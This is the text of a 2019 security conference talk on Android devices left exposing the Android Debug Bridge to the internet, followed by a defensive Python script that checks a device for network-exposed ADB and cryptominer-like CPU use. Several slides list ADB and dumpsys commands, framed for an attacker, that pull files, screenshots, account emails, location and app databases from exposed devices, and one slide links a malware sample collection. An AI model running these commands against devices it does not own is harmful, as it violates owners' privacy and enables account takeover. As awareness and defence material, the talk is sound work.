Making it Rain Android Shells - How 30,000+ Android devices are exposed to the internet and waiting to be compromised


Explore how thousands of Android devices are exposed to the internet through the Android Debug Bridge. Find out what devices are exposed, how they are exposed, examples of what an attacker could do with this exposure as well as what the bad guys are already doing with this exposure. This presentation was presented at BSides Melbourne 2019.


  1. Port: 5555
  2. Making it Rain Android Shells: How 30,000+ Android devices are exposed to the internet and waiting to be compromised. Steph Jensen, @B15Mu7h
  3. The Android Debug Bridge #BSidesMelb19
  4. The Android Debug Bridge
  5. Exposed Devices
  6. ADB Exposure. Top 3 exposed Android versions in order of prevalence: 1. Jelly Bean 2. Nougat 3. Marshmallow
  7. ADB Exposure. Top mobile device models exposed: 1. Pixel 2 XL (12% global exposure) 2. Samsung Galaxy Note3 (11.2% global exposure) 3. Samsung S5 (11.3% global exposure). Top impacted countries: 1. South Korea 2. Taiwan 3. China 4. Russia 5. Venezuela
  8. Why is this happening? 1. Developers are enabling ADB to assist in debugging operations (easier over the network than over USB). 2. Vendors are shipping products with ADB enabled over the network. 3. Users are enabling ADB on personal devices to access 3rd-party applications on their devices.
  9. What can you do with a remote ADB connection on non-rooted devices? • ADB commands • Shell commands • Dumpsys • Getprop • So many things you can do!!!
  10. ADB command examples (Data – Command):
     • Shell on 1 device if multiple devices are connected – adb -s <ip address> shell
     • Connect multiple devices – run bash script (included at end)
     • Upload any file onto device – adb push <file to upload> <file upload location>
     • Download file from device – adb pull <file to download> <location on attacking machine to download files to>
     • Take a screenshot of what is happening on the device – adb shell screencap -p /<directory to save>/<filename>.png
     • Take a video of what is happening on the device – adb shell screenrecord <path on device>
     • View system messages and application logs – adb logcat (or run logcat inside the shell)
  11. ADB command example (pull & screencap). [Screenshots: file accessible in external storage areas; check when the user unlocks the screen, then screenshot]
  12. Dumpsys service examples (Data – Command):
     • See all services – * dumpsys | grep "DUMP OF SERVICE"
     • Accounts used for applications (email addresses) – * dumpsys account
     • Last known location of device – * dumpsys location
     • Data sync info – * dumpsys contents
     • Telephone and provider information – * dumpsys telephony.registry
     • Network connection information – * dumpsys connectivity
     • Memory information – * dumpsys meminfo
     • Wifi interface information – * dumpsys wifi
     (* stands for "adb shell", or "adb shell -n" if you are connected to multiple devices with the adb+ script)
  13. Dumpsys command examples (account)
  14. Dumpsys command examples (notification)
  15. Other commands (Data – Command):
     • Kernel version – * cat /proc/version
     • Find external storage location on device – * echo $EXTERNAL_STORAGE
     • Input keyevents – * input <type of input> <input value>
     • System state information – * dumpstate
     • Kernel debugging info – * dmesg
     • System/application logging information – * logcat
     • List all packages on the device – * pm list packages -f; path of one package – * pm path <package name>
     • Access databases using permissions available from the specified (debuggable) application – * run-as debuggable.app.package.name cat databases/<file> > <file>
     (* stands for "adb shell", or "adb shell -n" if you are connected to multiple devices with the adb+ script)
  16. Information accessible via devices running ADB (unrooted): • Email addresses of user • Usernames in use in other applications • Notifications from all applications • Phone numbers of contacts • Emails received • Applications the user uses • Location of user • Model, build, version of device • Malware on device • Internal network information • Screenshots of the screen • Access to files in external storage • Database files associated with certain applications
  17. What are the bad guys doing with this exposure? • Cryptominer turf wars (Trinity vs Fbot vs ufo miner) • Backdooring malware • RUSSIANS
  18. Identifying malware through ADB: finding cryptominers through dumpsys cpuinfo. [Screenshot: decompiled ufo.miner, run.html file]
  19. Free stuff for you! Android malware samples that use ADB as a vector for infection: https://github.com/b15mu7h/androidmalwarezoo
  20. Takeaways • "Features" can be more than benign features • Even if a device isn't rooted, it can expose sensitive information that can be used to take over accounts, pivot to an internal network, assist in social engineering campaigns or ransom the user. • DON'T EXPOSE THE ANDROID DEBUG BRIDGE TO THE INTERNET. @B15Mu7h
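The two checks a device owner or fleet administrator would want from slides 15 and 18, in one added example that is not part of the talk: an audit of `adb shell getprop` output for the settings that make adbd reachable over the network (the `service.adb.tcp.port` / `persist.adb.tcp.port` properties, `sys.usb.config`, `ro.debuggable`, `ro.secure` and `ro.adb.secure` are standard Android system properties), and a triage of `adb shell dumpsys cpuinfo` output that flags unexpected processes burning CPU, the cryptominer tell the deck points at. Both sample outputs below are constructed for this example, not captured from a real device; the process name `constructed.unknown.app`, the model string and the allowlist are assumptions.

```python
"""
Offline triage of two 'adb shell' outputs from a device you administer:
  * getprop          -> is adbd listening on TCP / is the build debuggable?
  * dumpsys cpuinfo  -> which unexpected processes are burning CPU?
Sample outputs are constructed for this example, not real device captures.
"""
import re
from typing import Dict, List, Tuple

# Constructed 'adb shell getprop' excerpt; real output is "[key]: [value]" per line.
SAMPLE_GETPROP = """\
[ro.build.version.release]: [7.0]
[ro.debuggable]: [1]
[ro.secure]: [0]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[persist.adb.tcp.port]: [5555]
[sys.usb.config]: [mtp,adb]
[ro.product.model]: [CONSTRUCTED-MODEL]
"""

# Constructed 'adb shell dumpsys cpuinfo' excerpt (process name is an assumption).
SAMPLE_CPUINFO = """\
Load: 3.12 / 2.88 / 2.61
CPU usage from 30421ms to 1ms ago:
  96% 4312/constructed.unknown.app: 94% user + 2% kernel
  12% 1567/system_server: 8% user + 4% kernel / faults: 1240 minor 3 major
  3.1% 800/surfaceflinger: 2% user + 1.1% kernel
  0.9% 1801/com.android.systemui: 0.5% user + 0.4% kernel
100% TOTAL: 90% user + 9% kernel + 1% iowait
"""

_PROP_RE = re.compile(r"^\[([^\]]+)\]: \[(.*)\]$")
# Per-process lines look like "  12% 1567/system_server: ..."; the TOTAL line
# has no "pid/" part and therefore does not match.
_CPU_RE = re.compile(r"^\s*(\d+(?:\.\d+)?)%\s+(\d+)/([^:]+):")


def parse_getprop(text: str) -> Dict[str, str]:
    """Turn getprop output into a {key: value} dict, ignoring malformed lines."""
    props: Dict[str, str] = {}
    for line in text.splitlines():
        m = _PROP_RE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props


def audit_adb_exposure(props: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    for key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
        port = props.get(key, "")
        if port.isdigit() and int(port) > 0:  # unset or -1 means USB-only adbd
            scope = "persists across reboot" if key.startswith("persist") else "current boot"
            findings.append(f"adbd listening on TCP port {port} ({key}, {scope})")
    if "adb" in props.get("sys.usb.config", "").split(","):
        findings.append("USB debugging enabled (sys.usb.config contains adb)")
    if props.get("ro.debuggable") == "1":
        findings.append("debuggable build (ro.debuggable=1)")
    if props.get("ro.secure") == "0":
        findings.append("adbd runs as root (ro.secure=0)")
    if props.get("ro.adb.secure") == "0":
        findings.append("adb RSA authentication disabled (ro.adb.secure=0)")
    return findings


# Processes expected to show up in cpuinfo on a healthy device (assumed allowlist).
DEFAULT_ALLOWLIST = frozenset({"system_server", "surfaceflinger", "com.android.systemui"})


def flag_cpu_hogs(text: str, threshold: float = 50.0,
                  allowlist=DEFAULT_ALLOWLIST) -> List[Tuple[str, int, float]]:
    """Return (name, pid, cpu%) for non-allowlisted processes at or above threshold."""
    hogs: List[Tuple[str, int, float]] = []
    for line in text.splitlines():
        m = _CPU_RE.match(line)
        if not m:
            continue  # load average, header or TOTAL line
        pct, pid, name = float(m.group(1)), int(m.group(2)), m.group(3).strip()
        if pct >= threshold and name not in allowlist:
            hogs.append((name, pid, pct))
    return hogs


if __name__ == "__main__":
    for finding in audit_adb_exposure(parse_getprop(SAMPLE_GETPROP)):
        print("FINDING:", finding)
    for name, pid, pct in flag_cpu_hogs(SAMPLE_CPUINFO):
        print(f"CPU HOG: {name} (pid {pid}) at {pct}%")
```

On a real device, feed the functions the output of `adb shell getprop` and `adb shell dumpsys cpuinfo` instead of the constructed samples; a non-empty result from `audit_adb_exposure` on a device that is reachable from the internet is exactly the exposure the deck measured, and switching adbd back to USB-only (`adb usb`) clears the `service.adb.tcp.port` finding for the current boot.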
